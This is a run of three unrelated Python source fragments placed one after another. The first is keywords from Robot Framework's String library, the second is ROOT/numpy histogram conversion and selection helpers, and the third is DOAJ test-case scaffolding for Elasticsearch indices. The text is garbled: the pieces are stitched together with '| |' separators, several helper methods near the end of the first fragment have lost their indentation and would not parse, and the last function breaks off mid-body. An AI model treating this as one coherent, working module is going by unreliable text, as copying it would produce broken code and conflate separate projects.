    multiple groups are used, the list contains tuples that contain
    individual group contents. All groups can be given as indexes (starting
    from 1) and named groups also as names.
    Examples:
    | ${no match} =    | Get Regexp Matches | the string | xxx |
    | ${matches} =     | Get Regexp Matches | the string | t.. |
    | ${one group} =   | Get Regexp Matches | the string | t(..) | 1 |
    | ${named group} = | Get Regexp Matches | the string | t(?P<name>..) | name |
    | ${two groups} =  | Get Regexp Matches | the string | t(.)(.) | 1 | 2 |
    =>
    | ${no match} = []
    | ${matches} = ['the', 'tri']
    | ${one group} = ['he', 'ri']
    | ${named group} = ['he', 'ri']
    | ${two groups} = [('h', 'e'), ('r', 'i')]
    New in Robot Framework 2.9.
    """
    group_ids = [self._parse_group(g) for g in groups]
    return [found.group(*group_ids)
            for found in re.compile(pattern).finditer(string)]
def _parse_group(self, group):
    # Group identifiers may be indexes (given as strings) or group names:
    # return an int when the value parses as one, otherwise the name as-is.
    try:
        return int(group)
    except ValueError:
        return group
def replace_string(self, string, search_for, replace_with, count=-1):
    """Replaces ``search_for`` in the given ``string`` with ``replace_with``.
    ``search_for`` is used as a literal string. See `Replace String
    Using Regexp` if more powerful pattern matching is needed.
    If you need to just remove a string see `Remove String`.
    If the optional argument ``count`` is given, only that many
    occurrences from left are replaced. Negative ``count`` means
    that all occurrences are replaced (default behaviour) and zero
    means that nothing is done.
    A modified version of the string is returned and the original
    string is not altered.
    Examples:
    | ${str} =        | Replace String | Hello, world!  | world | tellus   |
    | Should Be Equal | ${str}         | Hello, tellus! |       |          |
    | ${str} =        | Replace String | Hello, world!  | l     | ${EMPTY} | count=1 |
    | Should Be Equal | ${str}         | Helo, world!   |       |          |
    """
    times = self._convert_to_integer(count, 'count')
    return string.replace(search_for, replace_with, times)
def replace_string_using_regexp(self, string, pattern, replace_with, count=-1):
    """Replaces ``pattern`` in the given ``string`` with ``replace_with``.
    This keyword is otherwise identical to `Replace String`, but
    the ``pattern`` to search for is considered to be a regular
    expression. See `BuiltIn.Should Match Regexp` for more
    information about Python regular expression syntax in general
    and how to use it in Robot Framework test data in particular.
    If you need to just remove a string see `Remove String Using Regexp`.
    Examples:
    | ${str} = | Replace String Using Regexp | ${str} | 20\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d | <DATE> |
    | ${str} = | Replace String Using Regexp | ${str} | (Hello|Hi) | ${EMPTY} | count=1 |
    """
    count = self._convert_to_integer(count, 'count')
    # re.sub handles 0 and negative counts differently than string.replace:
    # there count=0 means "replace all", so short-circuit zero ourselves
    # and clamp negatives (meaning "replace all") to 0 for re.sub.
    if count == 0:
        return string
    # Pass count as a keyword argument: positional use is ambiguous with
    # `flags` and is deprecated as of Python 3.13.
    return re.sub(pattern, replace_with, string, count=max(count, 0))
def remove_string(self, string, *removables):
    """Removes all ``removables`` from the given ``string``.
    ``removables`` are used as literal strings. Each removable will be
    matched to a temporary string from which preceding removables have
    been already removed. See second example below.
    Use `Remove String Using Regexp` if more powerful pattern matching is
    needed. If only a certain number of matches should be removed,
    `Replace String` or `Replace String Using Regexp` can be used.
    A modified version of the string is returned and the original
    string is not altered.
    Examples:
    | ${str} =        | Remove String | Robot Framework | work   |
    | Should Be Equal | ${str}        | Robot Frame     |
    | ${str} =        | Remove String | Robot Framework | o | bt |
    | Should Be Equal | ${str}        | R Framewrk      |
    New in Robot Framework 2.8.2.
    """
    # Remove each literal in turn; order matters (see docstring example).
    for item in removables:
        string = self.replace_string(string, item, '')
    return string
def remove_string_using_regexp(self, string, *patterns):
    """Removes ``patterns`` from the given ``string``.
    This keyword is otherwise identical to `Remove String`, but
    the ``patterns`` to search for are considered to be a regular
    expression. See `Replace String Using Regexp` for more information
    about the regular expression syntax. That keyword can also be
    used if there is a need to remove only a certain number of
    occurrences.
    New in Robot Framework 2.8.2.
    """
    # Apply each pattern in turn to the progressively stripped string.
    for regexp in patterns:
        string = self.replace_string_using_regexp(string, regexp, '')
    return string
def split_string(self, string, separator=None, max_split=-1):
    """Splits the ``string`` using ``separator`` as a delimiter string.
    If a ``separator`` is not given, any whitespace string is a
    separator. In that case also possible consecutive whitespace
    as well as leading and trailing whitespace is ignored.
    Split words are returned as a list. If the optional
    ``max_split`` is given, at most ``max_split`` splits are done, and
    the returned list will have maximum ``max_split + 1`` elements.
    Examples:
    | @{words} =         | Split String | ${string} |
    | @{words} =         | Split String | ${string} | ,${SPACE} |
    | ${pre} | ${post} = | Split String | ${string} | ::        | 1 |
    See `Split String From Right` if you want to start splitting
    from right, and `Fetch From Left` and `Fetch From Right` if
    you only want to get first/last part of the string.
    """
    if separator == '':
        separator = None	# Empty separator means whitespace splitting
    limit = self._convert_to_integer(max_split, 'max_split')
    return string.split(separator, limit)
def split_string_from_right(self, string, separator=None, max_split=-1):
    """Splits the ``string`` using ``separator`` starting from right.
    Same as `Split String`, but splitting is started from right. This has
    an effect only when ``max_split`` is given.
    Examples:
    | ${first} | ${rest} = | Split String            | ${string} | - | 1 |
    | ${rest} | ${last} =  | Split String From Right | ${string} | - | 1 |
    """
    if separator == '':
        separator = None	# Empty separator means whitespace splitting
    limit = self._convert_to_integer(max_split, 'max_split')
    return string.rsplit(separator, limit)
def split_string_to_characters(self, string):
    """Splits the given ``string`` to characters.
    Example:
    | @{characters} = | Split String To Characters | ${string} |
    New in Robot Framework 2.7.
    """
    return [character for character in string]
def fetch_from_left(self, string, marker):
    """Returns contents of the ``string`` before the first occurrence of ``marker``.
    If the ``marker`` is not found, whole string is returned.
    See also `Fetch From Right`, `Split String` and `Split String
    From Right`.
    """
    # partition() yields the whole string as the head when the marker
    # is absent, matching the documented behaviour.
    return string.partition(marker)[0]
def fetch_from_right(self, string, marker):
    """Returns contents of the ``string`` after the last occurrence of ``marker``.
    If the ``marker`` is not found, whole string is returned.
    See also `Fetch From Left`, `Split String` and `Split String
    From Right`.
    """
    # rpartition() yields the whole string as the tail when the marker
    # is absent, matching the documented behaviour.
    return string.rpartition(marker)[2]
def generate_random_string(self, length=8, chars='[LETTERS][NUMBERS]'):
    """Generates a string with a desired ``length`` from the given ``chars``.
    The population sequence ``chars`` contains the characters to use
    when generating the random string. It can contain any
    characters, and it is possible to use special markers
    explained in the table below:
    | = Marker =    | = Explanation = |
    | ``[LOWER]``   | Lowercase ASCII characters from ``a`` to ``z``. |
    | ``[UPPER]``   | Uppercase ASCII characters from ``A`` to ``Z``. |
    | ``[LETTERS]`` | Lowercase and uppercase ASCII characters. |
    | ``[NUMBERS]`` | Numbers from 0 to 9. |
    Examples:
    | ${ret} = | Generate Random String |
    | ${low} = | Generate Random String | 12 | [LOWER]         |
    | ${bin} = | Generate Random String | 8  | 01              |
    | ${hex} = | Generate Random String | 4  | [NUMBERS]abcdef |
    """
    if length == '':
        length = 8	# Empty argument in test data means the default length
    length = self._convert_to_integer(length, 'length')
    markers = (('[LOWER]', ascii_lowercase),
               ('[UPPER]', ascii_uppercase),
               ('[LETTERS]', ascii_lowercase + ascii_uppercase),
               ('[NUMBERS]', digits))
    for marker, expansion in markers:
        chars = chars.replace(marker, expansion)
    last = len(chars) - 1
    return ''.join(chars[randint(0, last)] for _ in range(length))
def get_substring(self, string, start, end=None):
    """Returns a substring from ``start`` index to ``end`` index.
    The ``start`` index is inclusive and ``end`` is exclusive.
    Indexing starts from 0, and it is possible to use
    negative indices to refer to characters from the end.
    Examples:
    | ${ignore first} = | Get Substring | ${string} | 1  |    |
    | ${ignore last} =  | Get Substring | ${string} |    | -1 |
    | ${5th to 10th} =  | Get Substring | ${string} | 4  | 10 |
    | ${first two} =    | Get Substring | ${string} |    | 1  |
    | ${last two} =     | Get Substring | ${string} | -2 |    |
    """
    begin = self._convert_to_index(start, 'start')
    stop = self._convert_to_index(end, 'end')
    return string[begin:stop]
def should_be_string(self, item, msg=None):
    """Fails if the given ``item`` is not a string.
    This keyword passes regardless is the ``item`` is a Unicode string or
    a byte string. Use `Should Be Unicode String` or `Should Be Byte
    String` if you want to restrict the string type.
    The default error message can be overridden with the optional
    ``msg`` argument.
    """
    if is_string(item):
        return
    self._fail(msg, "'%s' is not a string.", item)
def should_not_be_string(self, item, msg=None):
    """Fails if the given ``item`` is a string.
    The default error message can be overridden with the optional
    ``msg`` argument.
    """
    if not is_string(item):
        return
    self._fail(msg, "'%s' is a string.", item)
def should_be_unicode_string(self, item, msg=None):
    """Fails if the given ``item`` is not a Unicode string.

    Use `Should Be Byte String` to verify ``item`` is a byte string,
    or `Should Be String` if both Unicode and byte strings are fine.

    The default error message can be overridden with the optional
    ``msg`` argument.

    New in Robot Framework 2.7.7.
    """
    if is_unicode(item):
        return
    self._fail(msg, "'%s' is not a Unicode string.", item)
def should_be_byte_string(self, item, msg=None):
    """Fails if the given ``item`` is not a byte string.

    Use `Should Be Unicode String` to verify ``item`` is a Unicode
    string, or `Should Be String` if both Unicode and byte strings
    are fine.

    The default error message can be overridden with the optional
    ``msg`` argument.

    New in Robot Framework 2.7.7.
    """
    if is_bytes(item):
        return
    self._fail(msg, "'%s' is not a byte string.", item)
def should_be_lowercase(self, string, msg=None):
    """Fails if the given ``string`` is not in lowercase.

    For example, ``'string'`` and ``'with specials!'`` would pass, and
    ``'String'``, ``''`` and ``' '`` would fail.

    The default error message can be overridden with the optional
    ``msg`` argument.

    See also `Should Be Uppercase` and `Should Be Titlecase`.
    """
    if string.islower():
        return
    self._fail(msg, "'%s' is not lowercase.", string)
def should_be_uppercase(self, string, msg=None):
    """Fails if the given ``string`` is not in uppercase.

    For example, ``'STRING'`` and ``'WITH SPECIALS!'`` would pass, and
    ``'String'``, ``''`` and ``' '`` would fail.

    The default error message can be overridden with the optional
    ``msg`` argument.

    See also `Should Be Titlecase` and `Should Be Lowercase`.
    """
    if string.isupper():
        return
    self._fail(msg, "'%s' is not uppercase.", string)
def should_be_titlecase(self, string, msg=None):
    """Fails if the given ``string`` is not titlecased.

    ``string`` is titlecased if it contains at least one character,
    uppercase characters only follow uncased characters, and lowercase
    characters only follow cased ones.

    For example, ``'This Is Title'`` would pass, and ``'Word In UPPER'``,
    ``'Word In lower'``, ``''`` and ``' '`` would fail.

    The default error message can be overridden with the optional
    ``msg`` argument.

    See also `Should Be Uppercase` and `Should Be Lowercase`.
    """
    if string.istitle():
        return
    self._fail(msg, "'%s' is not titlecase.", string)
def _convert_to_index(self, value, name):
if value == '':
return 0
if value is None:
return None
return self._convert_to_integer(value, name)
def _convert_to_integer(self, value, name):
try:
return int(value)
except ValueError:
raise ValueError("Cannot convert '%s' argument '%s' to an integer."
% (name, value))
def _fail(self, message, default_template, *items):
if not message:
message = default_template % tuple(unic(item) for item in items)
raise AssertionError(message)
| |
import numpy as np
import ROOT
import math
def bin_centers(arr):
    """
    Get the middle values of an array of bin edges

    Parameters
    ----------
    arr: numpy.ndarray
        The array of bin edges

    Returns
    -------
    numpy.ndarray
        The array of centers
    """
    # Each center is the upper edge minus half the bin width.
    return arr[1:] - (np.ediff1d(arr) / 2.0)
def hist2array(hist, include_overflow=False, copy=True, return_edges=False, return_err=False):
    """
    This algorithm is Copyright (c) 2012-2017, The root_numpy developers
    See disclaimer here: https://github.com/scikit-hep/root_numpy/blob/master/LICENSE
    This function is an incomplete clone of root_numpy.hist2array for 1D histograms
    https://github.com/scikit-hep/root_numpy/blob/master/root_numpy/_hist.py

    Parameters
    ----------
    hist: ROOT.TH1
        The ROOT histogram to convert
    include_overflow: bool, optional (default=False)
        If true, the over and underflow bins will be part of the array
    copy: bool, optional (default=True)
        If true copy the underlying array to own its memory
    return_edges: bool, optional (default=False)
        If true, return bin edges
    return_err: bool, optional (default=False)
        If true, return the sqrt(sum(weights squared))

    Returns
    -------
    numpy.ndarray
        NumPy array with bin heights
    list(numpy.ndarray)
        A list of arrays. One for each axis' bin edges
    numpy.ndarray
        NumPy array of sqrt(sum(weights squared))
    """
    # Map the ROOT storage precision onto the matching numpy dtype.
    if isinstance(hist, ROOT.TH1F):
        dtype = 'f4'
    elif isinstance(hist, ROOT.TH1D):
        dtype = 'f8'
    else:
        raise TypeError('Must be ROOT.TH1F or ROOT.TH1D!')
    # ROOT stores N visible bins plus under- and overflow, hence +2.
    shape = (hist.GetNbinsX() + 2,)
    # Wrap the histogram's internal buffer without copying (yet).
    array = np.ndarray(shape=shape, dtype=dtype, buffer=hist.GetArray())
    if return_err:
        # Sumw2 holds the per-bin sum of squared weights; sqrt -> error.
        error = np.sqrt(np.ndarray(shape=shape, dtype='f8',
                                   buffer=hist.GetSumw2().GetArray()))
    if return_edges:
        # 1D only: a single axis getter taking no dimension argument.
        axis_getters, simple_hist, edges = ['GetXaxis'], True, []
        for idim, axis_getter in zip(range(1), axis_getters):
            ax = getattr(hist, axis_getter)(*(() if simple_hist else (idim,)))
            edges.append(np.empty(ax.GetNbins() + 1, dtype=np.double))
            # GetLowEdge fills the lower edges in place; the final upper
            # edge is appended separately below.
            ax.GetLowEdge(edges[-1])
            edges[-1][-1] = ax.GetBinUpEdge(ax.GetNbins())
    if not include_overflow:
        # Strip the first and last (under/overflow) entries on each axis.
        array = array[tuple([slice(1, -1) for idim in range(array.ndim)])]
        if return_err:
            error = error[tuple([slice(1, -1) for idim in range(error.ndim)])]
    array = np.transpose(array)
    if copy:
        # Own the memory so the result outlives the ROOT histogram.
        array = np.copy(array)
    if return_err:
        error = np.transpose(error)
        if copy:
            error = np.copy(error)
    if return_edges and return_err:
        return array, edges, error
    if return_edges:
        return array, edges
    if return_err:
        return array, error
    return array
def array2hist(array, hist_name='hist_name', binning=(10,0,100), errors=None):
    """
    Create a ROOT histogram from a numpy array.

    Parameters
    ----------
    array: np.ndarray
        numpy array where the elements are bin heights
    hist_name: str
        name for ROOT histogram
    binning: tuple
        binning for ROOT histogram as (nbins, xmin, xmax)
    errors: np.ndarray, optional (default=None)
        per-bin errors to assign; must have the same size as ``array``

    Returns
    -------
    ROOT.TH1
        a ROOT TH1F or TH1D (dependent on the array dtype)

    Raises
    ------
    ValueError
        if the array size does not match the number of bins, or
        ``errors`` does not match the array size
    TypeError
        if the array dtype is neither np.float32 nor np.float64
    """
    if array.size != binning[0]:
        raise ValueError('Array size must be number of bins!')
    # Pad one zero on each side for ROOT's under/overflow bins.
    padded = np.pad(array,(1,1),'constant')
    # TH1F stores 32-bit floats, TH1D 64-bit; match the array dtype.
    if array.dtype == np.float32:
        h = ROOT.TH1F(hist_name,hist_name,binning[0],binning[1],binning[2])
    elif array.dtype == np.float64:
        h = ROOT.TH1D(hist_name,hist_name,binning[0],binning[1],binning[2])
    else:
        raise TypeError('We can only handle np.float32 and np.float64')
    # TH1::Set copies the padded buffer (including under/overflow) in.
    h.Set(padded.size, padded)
    h.SetEntries(array.size)
    if errors is not None:
        if errors.size != array.size:
            raise ValueError('Error is not the same size as the array')
        # Errors are padded the same way and must be contiguous float64.
        pe = np.pad(np.ascontiguousarray(errors, dtype=np.float64), (1,1), 'constant')
        h.SetError(pe)
    return h
def shift_overflow(hist):
    """
    Move the contents of the overflow bin of a 1D ROOT histogram into
    its last visible bin (combining errors in quadrature), then zero
    the overflow bin. The histogram is modified in place.

    Parameters
    ----------
    hist: ROOT.TH1
        The ROOT histogram
    """
    if not isinstance(hist, ROOT.TH1):
        raise TypeError('Argument must be 1D ROOT histogram!')
    last = hist.GetNbinsX()
    overflow = last + 1
    content = hist.GetBinContent(overflow) + hist.GetBinContent(last)
    e_of, e_last = hist.GetBinError(overflow), hist.GetBinError(last)
    hist.SetBinContent(last, content)
    hist.SetBinError(last, math.sqrt(e_of * e_of + e_last * e_last))
    hist.SetBinContent(overflow, 0.0)
    hist.SetBinError(overflow, 0.0)
def tree2hist(tree, hist_name, binning, var, cut, overflow=False, negatives_to_zero=False):
    """
    A function to create a histogram using TTree::Draw()

    Parameters
    ----------
    tree: ROOT.TTree or ROOT.TChain
        The ROOT tree or chain
    hist_name: str
        The name-in-memory of the histogram to be created
    binning: tuple
        The binning of the histogram (nbins,xmin,xmax)
    var: str
        The variable (branch name) in the tree to histogram
    cut: str
        The selection string handed to TTree::Draw
    overflow: bool
        Shift the overflow bin into the last real bin
    negatives_to_zero: bool
        Make negative valued bins zero.

    Returns
    -------
    ROOT.TH1F
        The ROOT histogram created
    """
    if not isinstance(tree, ROOT.TTree):
        raise TypeError('Must be ROOT TTree or TChain')
    #ROOT.TH1.SetDefaultSumw2() hist with weights != 1 are automatically Sumw2'ed
    # Binning spec appended to the draw target, e.g. "(100,0,1)".
    bin_str = '('+str(binning[0])+','+str(binning[1])+','+str(binning[2])+')'
    # if the tree/chain is empty, just make an empty histogram.
    if tree.GetEntries() == 0:
        hist = ROOT.TH1F(hist_name,hist_name,binning[0],binning[1],binning[2])
        return hist
    # 'goff' suppresses graphics; the drawn histogram is registered in
    # ROOT's current directory, from which it is retrieved by name.
    tree.Draw(var+'>>'+hist_name+bin_str, cut, 'goff')
    hist = ROOT.gDirectory.Get(str(hist_name))
    if overflow:
        shift_overflow(hist)
    if negatives_to_zero:
        # hist2array returns visible-bin heights with 0-based indices;
        # ROOT bin numbering is 1-based, hence the +1.
        for idx in (np.where(hist2array(hist) < 0)[0]):
            hist.SetBinContent(int(idx)+1,0.0)
    return hist
def fast2full(root_file, faststr, fullstr, fast_nom, pnom, fast_nom_e, pnom_err, bins):
    """
    This function does the fast to full histogram scaling. Error is
    assigned using standard error propagation, since the error is
    just statistical. The new "FULL" sim histogram is returned.

    Parameters
    ----------
    root_file: ROOT.TFile
        The ROOT file for all of our histograms
    faststr: str
        The string label of the fast sim systematic histogram already in the output file
    fullstr: str
        The new string label for the "full" sim systematic histogram to be stored
    fast_nom: numpy.ndarray
        An array of bin heights for the fast sim nominal histogram
    pnom: numpy.ndarray
        The processes full sim nominal histogram bin heights
    fast_nom_e: numpy.ndarray
        The statistical uncertainty in each bin (fast sim nominal)
    pnom_err: numpy.ndarray
        The statistical uncertainty in each bin (full sim nominal)
    bins: tuple
        The number of bins, left edge, and right edge (nbins,xmin,xmax)

    Returns
    -------
    ROOT.TH1
        "Full Sim" ROOT histogram associated with the original fast sim histogram.
    """
    fast_a, err = hist2array(root_file.Get(faststr), return_err=True)
    # Scale the fast-sim systematic shape by the full/fast nominal ratio.
    full_a = (pnom/fast_nom)*fast_a
    # Standard error propagation for f = (pnom/fast_nom)*fast_a, treating
    # the uncertainties on pnom, fast_a, and fast_nom as independent:
    full_e_term = np.power(fast_a/fast_nom*pnom_err,2)
    full_e_term += np.power(pnom/fast_nom*err,2)
    full_e_term += np.power(pnom*fast_a/(fast_nom*fast_nom)*fast_nom_e,2)
    full_h = array2hist(full_a, fullstr, bins, errors=np.sqrt(full_e_term))
    return full_h
def np_selection(x, tcut):
    """
    Parse a ROOT TCut style string and construct a
    numpy array for selection (numpy array of bools)

    Parameters
    ----------
    x: np.array
        The numpy record array for the set of events; cut variables are
        looked up as attributes (``x.<name>``)
    tcut: str
        The ROOT style TCut. This is a limited cut that can only
        interpret "&&" combinations of ==, !=, >=, <=, and ! terms.

    Returns
    -------
    np.array
        The selection array of bools

    Raises
    ------
    TypeError
        If ``x`` is not a numpy array or ``tcut`` is not a string.
    """
    if not isinstance(x, np.ndarray):
        raise TypeError('x must be a numpy array!')
    if not isinstance(tcut, str):
        raise TypeError('cuts must be a string!')
    # Split directly on '&&'. The previous implementation split on a
    # single character pulled out of the string (tcut[tcut.find('&&')]),
    # which broke entirely for cut strings containing no '&&' at all
    # (find() returned -1, so it split on the last character).
    cuts = [c.strip() for c in tcut.split('&&') if c.strip()]
    sel = np.ones(x.shape[0], dtype=bool)
    for c in cuts:
        if '==' in c:
            name, val = c.split('==')
            sel &= (getattr(x, name) == float(val))
        elif '!=' in c:
            name, val = c.split('!=')
            sel &= (getattr(x, name) != float(val))
        elif '>=' in c:
            name, val = c.split('>=')
            sel &= (getattr(x, name) >= float(val))
        elif '<=' in c:
            name, val = c.split('<=')
            sel &= (getattr(x, name) <= float(val))
        elif '!' in c:
            # '!var' means the boolean branch must be False
            name = c.split('!')[1]
            sel &= (getattr(x, name) == False)  # noqa: E712
        else:
            # a bare 'var' means the boolean branch must be True
            sel &= (getattr(x, c) == True)  # noqa: E712
    return sel
def np_hist(dataset, var, binning, selection, weight, lumi=36.1, shift_overflow=True):
    """
    Create a histogram from purely numpy stored event data

    Parameters
    ----------
    dataset: numpy.ndarray (recarray)
        The numpy recarray for the dataset
    var: str
        The variable name that we're histogramming
    binning: tuple
        A tuple of (nbins, xmin, xmax)
    selection: np.ndarray (of bools)
        A numpy array of bools for event selection
    weight: str
        The weight variable in the dataset to use
    lumi: float
        The luminosity to scale to
    shift_overflow: bool
        Bring the overflow into the last real bin. (Previously this
        flag was accepted but ignored and the overflow was always
        folded in; it is now honoured. The default behaviour is
        unchanged.)

    Returns
    -------
    numpy.ndarray
        The bin heights
    numpy.ndarray
        The bin edges
    numpy.ndarray
        The statistical error in each bin
    """
    x = getattr(dataset, var)[selection]
    w = getattr(dataset, weight)[selection]*lumi
    bins = np.linspace(binning[1], binning[2], binning[0]+1)
    h, bins = np.histogram(x, bins=bins, weights=w)
    # Per-bin sum of squared weights -> statistical error.
    digitized = np.digitize(x, bins)
    bin_sumw2 = np.zeros(binning[0], dtype=w.dtype)
    for i in range(1, binning[0]+1):
        bin_sumw2[i-1] = sum(np.power(w[np.where(digitized == i)[0]], 2))
    if shift_overflow:
        # Count everything between the upper edge and a large cap
        # (1e6) as overflow and fold it into the last visible bin,
        # for both the height and the squared-weight sum.
        ofbs = np.array([binning[2], 1.0e6], dtype=np.float32)
        of, _ = np.histogram(x, bins=ofbs, weights=w)
        h[-1] += of[0]
        digiti_of = np.digitize(x, ofbs)
        bin_sumw2[-1] += sum(np.power(w[np.where(digiti_of == 1)[0]], 2))
    err = np.sqrt(bin_sumw2)
    return h, bins, err
| |
from flask_login import login_user
from unittest import TestCase
from portality import core, dao
from portality.app import app
from portality.tasks.redis_huey import main_queue, long_running
import dictdiffer
from datetime import datetime
from glob import glob
import os, csv, shutil
from portality.lib import paths
import functools
def patch_config(inst, properties):
    """Overwrite entries of ``inst.config`` and return the prior values.

    The returned dict maps each patched key to its previous value
    (``None`` when the key was absent), so it can be passed back to
    this function later to restore the original configuration.
    """
    previous = {key: inst.config.get(key) for key in properties}
    for key, value in properties.items():
        inst.config[key] = value
    return previous
def with_es(_func=None, *, indices=None, warm_mappings=None):
    """Decorator (usable with or without arguments) that runs the
    wrapped test function inside a WithES lifecycle: the requested
    indices are initialised before the call and torn down after it.
    """
    def decorate(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            return WithES(func, indices, warm_mappings)(*args, **kwargs)
        return inner
    # Bare @with_es gives _func directly; @with_es(...) gives None.
    return decorate if _func is None else decorate(_func)
class WithES:
    """Callable wrapper that brings up the required Elasticsearch index
    mappings around a single test-function invocation.

    Used via the ``with_es`` decorator: ``setUp`` initialises the
    requested mappings (optionally warming some by round-tripping a
    fixture record), the wrapped function runs, and ``tearDown``
    destroys the index again.
    """

    def __init__(self, func, indices=None, warm_mappings=None):
        # func: the wrapped test function.
        # indices: list of mapping names to initialise; None or "all"
        #     means every mapping.
        # warm_mappings: mapping names to pre-populate; only "article"
        #     is currently handled (see setUp).
        self.func = func
        self.indices = indices
        self.warm_mappings = warm_mappings if warm_mappings is not None else []

    def __call__(self, *args, **kwargs):
        # NOTE(review): tearDown is not run if the wrapped function
        # raises — the index is left behind for the next cleanup pass.
        self.setUp()
        resp = self.func(*args, **kwargs)
        self.tearDown()
        return resp

    def setUp(self):
        # only_mappings=None initialises every mapping; otherwise only
        # the explicitly requested subset is created.
        only_mappings = None
        if self.indices is not None and self.indices != "all":
            only_mappings = self.indices
        core.initialise_index(app, core.es_connection, only_mappings=only_mappings)
        for im in self.warm_mappings:
            if im == "article":
                self.warmArticle()
            # add more types if they are necessary

    def tearDown(self):
        dao.DomainObject.destroy_index()

    def warmArticle(self):
        # push an article to initialise the mappings
        from doajtest.fixtures import ArticleFixtureFactory
        from portality.models import Article
        source = ArticleFixtureFactory.make_article_source()
        article = Article(**source)
        article.save(blocking=True)
        article.delete()
        Article.blockdeleted(article.id)
# Mapping names already initialised during this test run; consulted by
# create_index() so the same mapping is not initialised twice, and
# reset by DoajTestCase.tearDown when the index is destroyed.
CREATED_INDICES = []


def create_index(index_type):
    """Initialise the ES mapping for ``index_type``, at most once per run."""
    if index_type in CREATED_INDICES:
        return
    core.initialise_index(app, core.es_connection, only_mappings=[index_type])
    CREATED_INDICES.append(index_type)
def dao_proxy(dao_method, type="class"):
    """Wrap a DomainObject DAO method so the matching index is created
    lazily (via create_index) just before the method runs.

    :param dao_method: the DAO method to wrap
    :param type: "class" produces a classmethod proxy (index name taken
        from ``cls.__type__``); any other value produces an instance
        method proxy (index name from ``self.__type__``)
    :return: the wrapped method, suitable for assignment back onto
        dao.DomainObject
    """
    if type == "class":
        @classmethod
        @functools.wraps(dao_method)
        def proxy_method(cls, *args, **kwargs):
            create_index(cls.__type__)
            # __func__ unwraps the original classmethod so it can be
            # called with the class explicitly.
            return dao_method.__func__(cls, *args, **kwargs)
        return proxy_method
    else:
        @functools.wraps(dao_method)
        def proxy_method(self, *args, **kwargs):
            create_index(self.__type__)
            return dao_method(self, *args, **kwargs)
        return proxy_method
class DoajTestCase(TestCase):
    """Base TestCase for DOAJ tests.

    ``setUpClass`` repoints the app config at the test Elasticsearch
    database and local temp storage, makes the huey queues eager, and
    wraps the DomainObject DAO methods so indices are created lazily on
    first use; ``tearDownClass`` restores the original configuration.
    """
    app_test = app  # the Flask application under test
    originals = {}  # config values replaced in setUpClass, for restore

    @classmethod
    def setUpClass(cls) -> None:
        # Patch the app config; the previous values are kept so
        # tearDownClass can put them back.
        cls.originals = patch_config(app, {
            "STORE_IMPL": "portality.store.StoreLocal",
            "STORE_LOCAL": paths.rel2abs(__file__, "..", "tmp", "store", "main", cls.__name__.lower()),
            "STORE_TMP_DIR": paths.rel2abs(__file__, "..", "tmp", "store", "tmp", cls.__name__.lower()),
            "ES_RETRY_HARD_LIMIT": 0,
            "ES_BLOCK_WAIT_OVERRIDE": 0.1,
            "ELASTIC_SEARCH_DB": app.config.get('ELASTIC_SEARCH_TEST_DB'),
            'ELASTIC_SEARCH_DB_PREFIX': core.app.config['ELASTIC_SEARCH_TEST_DB_PREFIX'] + cls.__name__.lower() + '-',
            "FEATURES": app.config['VALID_FEATURES'],
            'ENABLE_EMAIL': False,
            "FAKER_SEED": 1
        })
        # Run background tasks synchronously during tests.
        main_queue.always_eager = True
        long_running.always_eager = True
        # Wrap every DAO entry point so the relevant index is created
        # on demand (see dao_proxy / create_index).
        dao.DomainObject.save = dao_proxy(dao.DomainObject.save, type="instance")
        dao.DomainObject.delete = dao_proxy(dao.DomainObject.delete, type="instance")
        dao.DomainObject.bulk = dao_proxy(dao.DomainObject.bulk)
        dao.DomainObject.refresh = dao_proxy(dao.DomainObject.refresh)
        dao.DomainObject.pull = dao_proxy(dao.DomainObject.pull)
        dao.DomainObject.pull_by_key = dao_proxy(dao.DomainObject.pull_by_key)
        dao.DomainObject.send_query = dao_proxy(dao.DomainObject.send_query)
        dao.DomainObject.remove_by_id = dao_proxy(dao.DomainObject.remove_by_id)
        dao.DomainObject.delete_by_query = dao_proxy(dao.DomainObject.delete_by_query)
        dao.DomainObject.iterate = dao_proxy(dao.DomainObject.iterate)
        dao.DomainObject.count = dao_proxy(dao.DomainObject.count)
        # if a test on a previous run has totally failed and tearDownClass has not run, then make sure the index is gone first
        dao.DomainObject.destroy_index()
        # time.sleep(1) # I don't know why we slept here, but not in tearDown, so I have removed it

    @classmethod
    def tearDownClass(cls) -> None:
        # Restore the config values saved in setUpClass.
        patch_config(app, cls.originals)
        cls.originals = {}

    def setUp(self):
        pass

    def tearDown(self):
        # Remove any history files written today, then the tmp tree,
        # then the test index if any mapping was created.
        for f in self.list_today_article_history_files() + self.list_today_journal_history_files():
            os.remove(f)
        shutil.rmtree(paths.rel2abs(__file__, "..", "tmp"), ignore_errors=True)
        global CREATED_INDICES
        if len(CREATED_INDICES) > 0:
            dao.DomainObject.destroy_index()
            CREATED_INDICES = []

    def list_today_article_history_files(self):
        """Paths of article history files written today."""
        return glob(os.path.join(app.config['ARTICLE_HISTORY_DIR'], datetime.now().strftime('%Y-%m-%d'), '*'))

    def list_today_journal_history_files(self):
        """Paths of journal history files written today."""
        return glob(os.path.join(app.config['JOURNAL_HISTORY_DIR'], datetime.now().strftime('%Y-%m-%d'), '*'))

    def _make_and_push_test_context(self, path="/", acc=None):
        """Push a Flask test request context; optionally save ``acc``
        (blocking) and log it in. Returns the pushed context."""
        ctx = self.app_test.test_request_context(path)
        ctx.push()
        if acc is not None:
            acc.save(blocking=True)
            login_user(acc)
        return ctx
def diff_dicts(d1, d2, d1_label='d1', d2_label='d2', print_unchanged=False):
    """
    Diff two dictionaries - prints changed, added and removed keys and the changed values. DOES NOT DO NESTED DICTS!

    :param d1: First dict - we compare this with d2
    :param d2: Second dict - we compare against this one
    :param d1_label: Will be used instead of "d1" in debugging output to make it more helpful.
    :param d2_label: Will be used instead of "d2" in debugging output to make it more helpful.
    :param print_unchanged: - should we print set of unchanged keys (can be long and useless). Default: False.
    :return: nothing, prints results to STDOUT
    """
    differ = dictdiffer.DictDiffer(d1, d2)
    print('Added :: keys present in {d1} which are not in {d2}'.format(d1=d1_label, d2=d2_label))
    print(differ.added())
    print()
    print('Removed :: keys present in {d2} which are not in {d1}'.format(d1=d1_label, d2=d2_label))
    print(differ.removed())
    print()
    print('Changed :: keys which are the same in {d1} and {d2} but whose values are different'.format(d1=d1_label, d2=d2_label))
    print(differ.changed())
    print()
    # Only expand per-key values when something actually changed.
    if differ.changed():
        print('Changed values :: the values of keys which have changed. Format is as follows:')
        print('  Key name:')
        print('    value in {d1}'.format(d1=d1_label))
